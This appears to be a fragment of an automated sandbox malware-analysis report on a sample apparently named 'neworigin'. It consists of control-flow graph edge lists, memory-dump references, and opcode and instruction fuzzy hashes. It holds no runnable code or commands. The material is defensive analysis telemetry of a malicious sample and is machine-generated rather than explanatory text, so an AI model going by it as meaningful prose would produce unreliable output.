6427ffb-6428023 991->1005 1053 6428350 998->1053 1054 6428344-642834e 998->1054 1004->990 1005->1004 1012 6428029-6428057 1005->1012 1012->1004 1017 642805d-6428066 1012->1017 1017->1004 1019 642806c-642809e 1017->1019 1026 64280a0-64280a4 1019->1026 1027 64280a9-64280c5 1019->1027 1026->1004 1029 64280a6 1026->1029 1027->990 1030 64280c7-642811e call 6426698 1027->1030 1029->1027 1030->990 1055 6428355-6428357 1053->1055 1054->1055 1055->985 1056 6428359-642835e 1055->1056 1057 6428360-642836a 1056->1057 1058 642836c 1056->1058 1059 6428371-6428373 1057->1059 1058->1059 1059->985 1060 6428375-6428381 1059->1060 1060->985
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q
                                                                                                                    • API String ID: 0-127220927
                                                                                                                    • Opcode ID: bc8e1c16cc797425bdd9681f30360936ae6284475562e31bac8ace950932fee9
                                                                                                                    • Instruction ID: a7920de05da0dde0be610f8525a9328278fb35cd577390272e0dfe9936704ea0
                                                                                                                    • Opcode Fuzzy Hash: bc8e1c16cc797425bdd9681f30360936ae6284475562e31bac8ace950932fee9
                                                                                                                    • Instruction Fuzzy Hash: E302AD30B002268FDB55DF68D890A6EB7F6FF84304F648929E4059B395DB35EC86CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1ee9ad72e42d52c5bfc30b8330384d5a4dec3f57b9d778734d0f0f8bb7966bb2
                                                                                                                    • Instruction ID: 88a66ec65366f1f1ea5b9a19a9e0f7680f05109772b437291a0ce4230ff0bc7f
                                                                                                                    • Opcode Fuzzy Hash: 1ee9ad72e42d52c5bfc30b8330384d5a4dec3f57b9d778734d0f0f8bb7966bb2
                                                                                                                    • Instruction Fuzzy Hash: 93A26834A002158FDB61DF68C584B9EBBF2FB45314FA484AAD409AB361DB75ED86CF40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6ab24613e9515427e5a7f43a86a1b587b459fdd4782ed65783f84acf6551a306
                                                                                                                    • Instruction ID: 02fe49b105482915b60de535b2f4e93d2e3027af47a3331c9717f0ccc3839038
                                                                                                                    • Opcode Fuzzy Hash: 6ab24613e9515427e5a7f43a86a1b587b459fdd4782ed65783f84acf6551a306
                                                                                                                    • Instruction Fuzzy Hash: 5162C030A002258FDB55DF68D984BAEB7F2EF85304F65846AE409EB354DB35ED46CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ecabf5129ac4549d3e5f6f82df98afac37701ea2d6cdc6389fc99a80d362c324
                                                                                                                    • Instruction ID: c25a6a55a0fa92ca325c1ffac49ddc828579d9be23563ff484b32c6ef9e975c4
                                                                                                                    • Opcode Fuzzy Hash: ecabf5129ac4549d3e5f6f82df98afac37701ea2d6cdc6389fc99a80d362c324
                                                                                                                    • Instruction Fuzzy Hash: 2632A230A002168FDB95DF68D990BAEB7B6FF88310F60852AE405E7355DB35EC46CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 82bd64011bba8c25bb4faed83fefb75f410d03bf8fc36481453a4be4fb6bb3cf
                                                                                                                    • Instruction ID: ac5019e96927489e52d4931f04caa0258eb10d584ae379d6c240bcf5375f4d1e
                                                                                                                    • Opcode Fuzzy Hash: 82bd64011bba8c25bb4faed83fefb75f410d03bf8fc36481453a4be4fb6bb3cf
                                                                                                                    • Instruction Fuzzy Hash: 1D22D271F102269FDB69DF64D88066EB7B2EF84310F64846AD94A9B344DA34DC42CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 257 642b760-642b782 258 642b784-642b787 257->258 259 642b789-642b78d 258->259 260 642b7ae-642b7b1 258->260 261 642b793-642b7a3 259->261 262 642bb05-642bb3e 259->262 263 642b7b3-642b7b7 260->263 264 642b7c8-642b7cb 260->264 275 642b936-642b93a 261->275 276 642b7a9 261->276 272 642bb40-642bb43 262->272 263->262 265 642b7bd-642b7c3 263->265 266 642b7d2-642b7d5 264->266 267 642b7cd-642b7cf 264->267 265->264 269 642b7e2-642b7e5 266->269 270 642b7d7-642b7dd 266->270 267->266 273 642b7e7-642b7eb 269->273 274 642b7f9-642b7fc 269->274 270->269 278 642bb66-642bb69 272->278 279 642bb45-642bb61 272->279 273->262 280 642b7f1-642b7f4 273->280 281 642b802-642b805 274->281 282 642bad5-642bad6 274->282 275->262 277 642b940-642b950 275->277 276->260 296 642b956 277->296 297 642ba9a-642ba9e 277->297 285 642bdd5-642bdd7 278->285 286 642bb6f-642bb97 278->286 279->278 280->274 283 642b807-642b864 call 6426698 281->283 284 642b869-642b86c 281->284 287 642badb-642bade 282->287 283->284 290 642b86e-642b877 284->290 291 642b87c-642b87f 284->291 292 642bdd9 285->292 293 642bdde-642bde1 285->293 335 642bba1-642bbe5 286->335 336 642bb99-642bb9c 286->336 294 642bae0-642bae5 287->294 295 642bae8-642baea 287->295 290->291 298 642b8a1-642b8a4 291->298 299 642b881-642b89c 291->299 292->293 293->272 300 642bde7-642bdf0 293->300 294->295 303 642baf1-642baf4 295->303 304 642baec 295->304 309 642b95b-642b95e 296->309 297->262 306 642baa0-642bab0 297->306 307 642b8a6-642b8a9 298->307 308 642b8ae-642b8b1 298->308 299->298 303->258 305 642bafa-642bb04 303->305 304->303 306->282 328 642bab2 306->328 307->308 312 642b8b3-642b8bc 308->312 313 642b8c1-642b8c4 308->313 314 642b960-642b966 309->314 315 642b978-642b97b 309->315 312->313 320 642b903-642b906 313->320 321 642b8c6-642b8db 313->321 314->262 322 642b96c-642b973 314->322 323 642b992-642b995 315->323 324 642b97d-642b981 315->324 329 642b916-642b919 320->329 330 642b908-642b911 320->330 321->262 349 642b8e1-642b8fe 321->349 322->315 323->282 332 642b99b-642b99e 323->332 324->262 331 642b987-642b98d 324->331 337 642bab7-642baba 328->337 339 642b91f-642b922 329->339 340 642babc-642bac5 329->340 330->329 331->323 333 642b9b0-642b9b3 332->333 334 642b9a0 332->334 344 642b9c5-642b9c8 333->344 345 642b9b5-642b9c0 333->345 352 642b9a8-642b9ab 334->352 376 642bdca-642bdd4 335->376 377 642bbeb-642bbf4 335->377 336->300 337->340 346 642bad0-642bad3 337->346 341 642b931-642b934 339->341 342 642b924-642b92a 339->342 347 642ba0a-642ba13 340->347 348 642bacb 340->348 341->275 341->309 342->314 350 642b92c 342->350 354 642b9ca-642b9ce 344->354 355 642b9d9-642b9dc 344->355 345->344 346->282 346->287 347->262 351 642ba19-642ba20 347->351 348->346 349->320 350->341 356 642ba25-642ba28 351->356 352->333 354->312 359 642b9d4 354->359 360 642b9de-642b9e7 355->360 361 642b9ec-642b9ef 355->361 356->282 363 642ba2e-642ba31 356->363 359->355 360->361 361->342 365 642b9f5-642b9f8 361->365 366 642ba33-642ba4f 363->366 367 642ba54-642ba57 363->367 369 642ba05-642ba08 365->369 370 642b9fa-642ba00 365->370 366->367 372 642ba95-642ba98 367->372 373 642ba59-642ba6e 367->373 369->347 369->356 370->369 372->297 372->337 373->262 382 642ba74-642ba90 373->382 378 642bdc0-642bdc5 377->378 379 642bbfa-642bc66 call 6426698 377->379 378->376 391 642bd60-642bd75 379->391 392 642bc6c-642bc71 379->392 382->372 391->378 394 642bc73-642bc79 392->394 395 642bc8d 392->395 396 642bc7b-642bc7d 394->396 397 642bc7f-642bc81 394->397 398 642bc8f-642bc95 395->398 399 642bc8b 396->399 397->399 400 642bc97-642bc9d 398->400 401 642bcaa-642bcb7 398->401 399->398 402 642bca3 400->402 403 642bd4b-642bd5a 400->403 408 642bcb9-642bcbf 401->408 409 642bccf-642bcdc 401->409 402->401 404 642bd12-642bd1f 402->404 405 642bcde-642bceb 402->405 403->391 403->392 414 642bd21-642bd27 404->414 415 642bd37-642bd44 404->415 417 642bd03-642bd10 405->417 418 642bced-642bcf3 405->418 410 642bcc3-642bcc5 408->410 411 642bcc1 408->411 409->403 410->409 411->409 419 642bd2b-642bd2d 414->419 420 642bd29 414->420 415->403 417->403 421 642bcf7-642bcf9 418->421 422 642bcf5 418->422 419->415 420->415 421->417 422->417
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-3723351465
                                                                                                                    • Opcode ID: 086449b327d5a2ac5c1b1caac12e00fc4b11a70c7caf3eb76ce28397e8776a8c
                                                                                                                    • Instruction ID: 5d78d185daf748e5fd09d19d16788d73ef78076d2bd543fd5f64f66637af89df
                                                                                                                    • Opcode Fuzzy Hash: 086449b327d5a2ac5c1b1caac12e00fc4b11a70c7caf3eb76ce28397e8776a8c
                                                                                                                    • Instruction Fuzzy Hash: B6028F30E1022A8FDB65CF68D4806AEB7B1FF45318F60892AD449DB355DB34DD86CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 425 6429250-6429275 426 6429277-642927a 425->426 427 6429280-6429295 426->427 428 6429b38-6429b3b 426->428 435 6429297-642929d 427->435 436 64292ad-64292c3 427->436 429 6429b61-6429b63 428->429 430 6429b3d-6429b5c 428->430 432 6429b65 429->432 433 6429b6a-6429b6d 429->433 430->429 432->433 433->426 437 6429b73-6429b7d 433->437 438 64292a1-64292a3 435->438 439 642929f 435->439 442 64292ce-64292d0 436->442 438->436 439->436 443 64292d2-64292d8 442->443 444 64292e8-6429359 442->444 445 64292da 443->445 446 64292dc-64292de 443->446 455 6429385-64293a1 444->455 456 642935b-642937e 444->456 445->444 446->444 461 64293a3-64293c6 455->461 462 64293cd-64293e8 455->462 456->455 461->462 467 6429413-642942e 462->467 468 64293ea-642940c 462->468 473 6429453-6429461 467->473 474 6429430-642944c 467->474 468->467 475 6429463-642946c 473->475 476 6429471-64294eb 473->476 474->473 475->437 482 6429538-642954d 476->482 483 64294ed-642950b 476->483 482->428 487 6429527-6429536 483->487 488 642950d-642951c 483->488 487->482 487->483 488->487
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-858218434
                                                                                                                    • Opcode ID: 681366409ec1117d585c3cb746d46785d0caabe5f996602a5a092987249b8577
                                                                                                                    • Instruction ID: 9f10e27fe265b84ba98801e48ca268ffa097d002bcd581d95999590242a3bf27
                                                                                                                    • Opcode Fuzzy Hash: 681366409ec1117d585c3cb746d46785d0caabe5f996602a5a092987249b8577
                                                                                                                    • Instruction Fuzzy Hash: 98914D31F0022A8FDB55DF65D850BAEB7F6BF84304F608569D809EB344EB709D468B92

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1402 6429241-6429275 1404 6429277-642927a 1402->1404 1405 6429280-6429295 1404->1405 1406 6429b38-6429b3b 1404->1406 1413 6429297-642929d 1405->1413 1414 64292ad-64292c3 1405->1414 1407 6429b61-6429b63 1406->1407 1408 6429b3d-6429b5c 1406->1408 1410 6429b65 1407->1410 1411 6429b6a-6429b6d 1407->1411 1408->1407 1410->1411 1411->1404 1415 6429b73-6429b7d 1411->1415 1416 64292a1-64292a3 1413->1416 1417 642929f 1413->1417 1420 64292ce-64292d0 1414->1420 1416->1414 1417->1414 1421 64292d2-64292d8 1420->1421 1422 64292e8-6429359 1420->1422 1423 64292da 1421->1423 1424 64292dc-64292de 1421->1424 1433 6429385-64293a1 1422->1433 1434 642935b-642937e 1422->1434 1423->1422 1424->1422 1439 64293a3-64293c6 1433->1439 1440 64293cd-64293e8 1433->1440 1434->1433 1439->1440 1445 6429413-642942e 1440->1445 1446 64293ea-642940c 1440->1446 1451 6429453-6429461 1445->1451 1452 6429430-642944c 1445->1452 1446->1445 1453 6429463-642946c 1451->1453 1454 6429471-64294eb 1451->1454 1452->1451 1453->1415 1460 6429538-642954d 1454->1460 1461 64294ed-642950b 1454->1461 1460->1406 1465 6429527-6429536 1461->1465 1466 642950d-642951c 1461->1466 1465->1460 1465->1461 1466->1465
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q
                                                                                                                    • API String ID: 0-127220927
                                                                                                                    • Opcode ID: 11a3962f6ebef7961500f47a9c8f06fb4ddb44090d419d1075c31e4c7265084c
                                                                                                                    • Instruction ID: 2dddb159629e0af5dbb7c4271f05086fe2a1cab6d95b57be322184033231c003
                                                                                                                    • Opcode Fuzzy Hash: 11a3962f6ebef7961500f47a9c8f06fb4ddb44090d419d1075c31e4c7265084c
                                                                                                                    • Instruction Fuzzy Hash: 8B517E31B051269FDB55DB75D850BAEB7F6FF88300F208469D849EB344EA709C02CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 893338d5ecdc316c48ca3411ebbbcc2143c8de808b182718ff7a9c6c150936bd
                                                                                                                    • Instruction ID: 4fe13f2c7f26dc3cd2e9ee574f9960e9417115514b67bc37dc0716b8f7fba1bc
                                                                                                                    • Opcode Fuzzy Hash: 893338d5ecdc316c48ca3411ebbbcc2143c8de808b182718ff7a9c6c150936bd
                                                                                                                    • Instruction Fuzzy Hash: B461C171F000224FDB55AA7ED88065FBADBAFD4220B65407AD80EDB364DEB5ED0287D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f67cac05cdf29b43cf002a6ffd4b984d44a88e68bf0b846efe02a685fe74888b
                                                                                                                    • Instruction ID: 809ed677fe1e966e5b5dbc5c1c9457e661fc424ea4caf4f6bb557754c54917ea
                                                                                                                    • Opcode Fuzzy Hash: f67cac05cdf29b43cf002a6ffd4b984d44a88e68bf0b846efe02a685fe74888b
                                                                                                                    • Instruction Fuzzy Hash: 2A913D34E0021A8FDB61DF68C890B9EB7B1FF89304F208596D549AB355DB70AA85CF91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4a0b05194bfc8b779ab7d8abbde3f0a27f1d01780b2b381ee28977bf48424929
                                                                                                                    • Instruction ID: 88a294c4c647f433a3fc48d475e11e7aee6d14e7502fa3219b3b7462a7b6cfdf
                                                                                                                    • Opcode Fuzzy Hash: 4a0b05194bfc8b779ab7d8abbde3f0a27f1d01780b2b381ee28977bf48424929
                                                                                                                    • Instruction Fuzzy Hash: 44913D34E1021A8BDF60DF68C890B9DB7B1FF89304F208595D549BB355DB70AA85CF91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 91704a0f7608c93f5a83c1c9d5a36098b0256a75b5d8d370046001765cc193d3
                                                                                                                    • Instruction ID: f7923b3b8ae09d8355c34f4adeafdbd3d481ba264a86feb04ef40e069053a2f7
                                                                                                                    • Opcode Fuzzy Hash: 91704a0f7608c93f5a83c1c9d5a36098b0256a75b5d8d370046001765cc193d3
                                                                                                                    • Instruction Fuzzy Hash: CC510D70B502154FEFA57A6DE99472F266EEB89740FF0482BD40AC73D5CA28CC498792
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cd5ab1de48f98786c5144059d0a40d6bc68fd258cfc8df19e72a83401e687c5b
                                                                                                                    • Instruction ID: df85bd4adae68c092f466836b1a94e0d61f64252758221e4915543ec877d2dd0
                                                                                                                    • Opcode Fuzzy Hash: cd5ab1de48f98786c5144059d0a40d6bc68fd258cfc8df19e72a83401e687c5b
                                                                                                                    • Instruction Fuzzy Hash: B5510B70B602154FEFA5766DE95472F266EE789740FF0482AD80AC73D9CA28CC498792
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fbc62fcb7a55506e6900954a50c30fb3a1352e3c89037e5eff70e3599d633dc9
                                                                                                                    • Instruction ID: b762236339ce24a30f3d24123330603077bcb002fb92a1d203dcb91efea203b6
                                                                                                                    • Opcode Fuzzy Hash: fbc62fcb7a55506e6900954a50c30fb3a1352e3c89037e5eff70e3599d633dc9
                                                                                                                    • Instruction Fuzzy Hash: 130168317005210FDB668ABCD450B2F37EAEBC7310F60453AE00ACB340DA21DC0A83A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001B.00000002.2415293921.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_27_2_6420000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0ed1cf18b8b5e5a36be1df58d242fc09477b8f153bb77492276d6eb0db1a009f
                                                                                                                    • Instruction ID: 7d7f3c76ee6b69893148f8e81fd0dab51d3a3551eb07a600e99cc1a0ad0f3cf3
                                                                                                                    • Opcode Fuzzy Hash: 0ed1cf18b8b5e5a36be1df58d242fc09477b8f153bb77492276d6eb0db1a009f
                                                                                                                    • Instruction Fuzzy Hash: 9F012D31B100220BDBA695BDE45476F73EBD7C6710F60443AE10EC7340DE15DC064396